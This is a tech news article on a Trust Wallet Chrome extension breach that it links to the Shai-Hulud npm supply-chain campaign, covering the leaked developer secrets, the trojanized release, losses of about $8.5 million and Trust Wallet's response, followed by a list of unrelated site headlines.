Security
Shai-Hulud NPM Attack Leads to $8.5 Million Crypto Theft in Trust Wallet
Trust Wallet Security Breach: A Closer Look
Trust Wallet recently experienced a significant security breach, resulting in the theft of approximately $8.5 million from over 2,500 crypto wallets. The incident, which occurred on December 24th, is believed to be linked to a Sha1-Hulud attack that targeted the crypto industry in November.
As a popular crypto wallet used by more than 200 million individuals, Trust Wallet allows users to securely store, send, and receive various cryptocurrencies such as Bitcoin, Ethereum, and Solana. This is facilitated through its web browser extension and mobile apps.
The breach involved malicious actors adding a harmful JavaScript file to version 2.68.0 of Trust Wallet’s Chrome extension. This file enabled the theft of sensitive wallet data, leading to unauthorized transactions.
During the attack, the perpetrators exploited Trust Wallet’s exposed Developer GitHub secrets, gaining access to the browser extension source code and the Chrome Web Store API key. This access allowed them to upload builds directly without undergoing the standard release process.
Subsequently, the attackers registered malicious domains to host code referenced in a trojanized version of the Trust Wallet extension. This modified extension collected sensitive wallet data without the need for traditional code injection.
In response to the breach, Trust Wallet took immediate action by revoking all release APIs to prevent further unauthorized releases. They also reported the malicious domains to the registrar, leading to their suspension.
Furthermore, Trust Wallet initiated reimbursements for affected users and cautioned them about ongoing scams involving impersonation of Trust Wallet support accounts.
The Rise of Sha1-Hulud Malware Campaign
Sha1-Hulud, also known as Shai-Hulud 2.0, is a supply chain attack that targeted the npm software registry. This attack compromised over 800 packages and exposed around 400,000 raw secrets, highlighting the vulnerability of the npm ecosystem.
Security researchers have warned about the increasing sophistication of attackers in harvesting credentials through npm and GitHub, emphasizing the need for enhanced security measures within the development community.
Looking to enhance your team’s security practices? Download our comprehensive guide to secrets management for valuable insights and best practices.
Take the first step towards building a secure foundation for your projects.
![Apple pushing back on 'vibe coding' iPhone apps, developers say [U]](https://bennetttechinnovation.com/wp-content/uploads/2026/03/Apple-Stands-Firm-Against-Vibe-Coding-iPhone-Apps-Defying-Developers-80x80.jpg)
Apple Stands Firm Against ‘Vibe Coding’ iPhone Apps, Defying Developers
Secure APK Sideloading: Harnessing the Power of Advanced Flow for Safe Android Installation
Gunvolt Chronicles: Luminous Avenger iX – The Complete Dual Collection
K2 Launches Groundbreaking High-Powered Satellite for Advanced Space Computing
The End of Security: iOS 13 and 14 Vulnerabilities in 2026
Exclusive Look: The 2027 Chevrolet Corvette Grand Sport Unleashed at Sebring
DON’T buy a Screen Protector before watching this.
Exploiting Vulnerable Drivers: How EDR Killers Use BYOVD to Disable Security
Alphabet’s X Unveils Innovative Spinout Targeting Costly Bureaucratic Challenges
EU Takes Action Against Instagram and Facebook for Violating Illegal Content Rules
Warning: Facebook Creators Face Monetization Loss for Stealing and Reposting Videos
Facebook Compliance: ICE-tracking Page Removed After US Government Intervention
Facebook’s New Look: A Blend of Instagram’s Style
Facebook and Instagram to Reduce Personalized Ads for European Users
InstaDub: Meta’s AI Translation Tool for Instagram Videos
Reclaim Your Account: Facebook and Instagram Launch New Hub for Account Recovery
Meta discontinues Messenger apps for Windows and macOS
Breaking Updates: Meta Connect 2025 Unveils Latest Developments
DON’T buy a Screen Protector before watching this.
Beware of Fake Reviewers! ⚠️
Xiaomi Mi 11 Unboxing & Review.
The Galaxy S21 Ultra is Better than you think.
Samsung Galaxy S21 Ultra vs iPhone 12 Pro Max Camera Test Comparison.
Samsung S21 Ultra vs iPhone Battery Life Test!
The Truth about Xiaomi “Air Charging”
DON’T buy this Smartphone.
Galaxy S21 Ultra – Exynos vs Snapdragon.
-
Facebook5 months agoEU Takes Action Against Instagram and Facebook for Violating Illegal Content Rules
-
Facebook5 months agoWarning: Facebook Creators Face Monetization Loss for Stealing and Reposting Videos
-
Facebook5 months agoFacebook Compliance: ICE-tracking Page Removed After US Government Intervention
-
Facebook3 months agoFacebook’s New Look: A Blend of Instagram’s Style
-
Facebook3 months agoFacebook and Instagram to Reduce Personalized Ads for European Users
-
Facebook5 months agoInstaDub: Meta’s AI Translation Tool for Instagram Videos
-
Facebook4 months agoReclaim Your Account: Facebook and Instagram Launch New Hub for Account Recovery
-
Apple5 months agoMeta discontinues Messenger apps for Windows and macOS
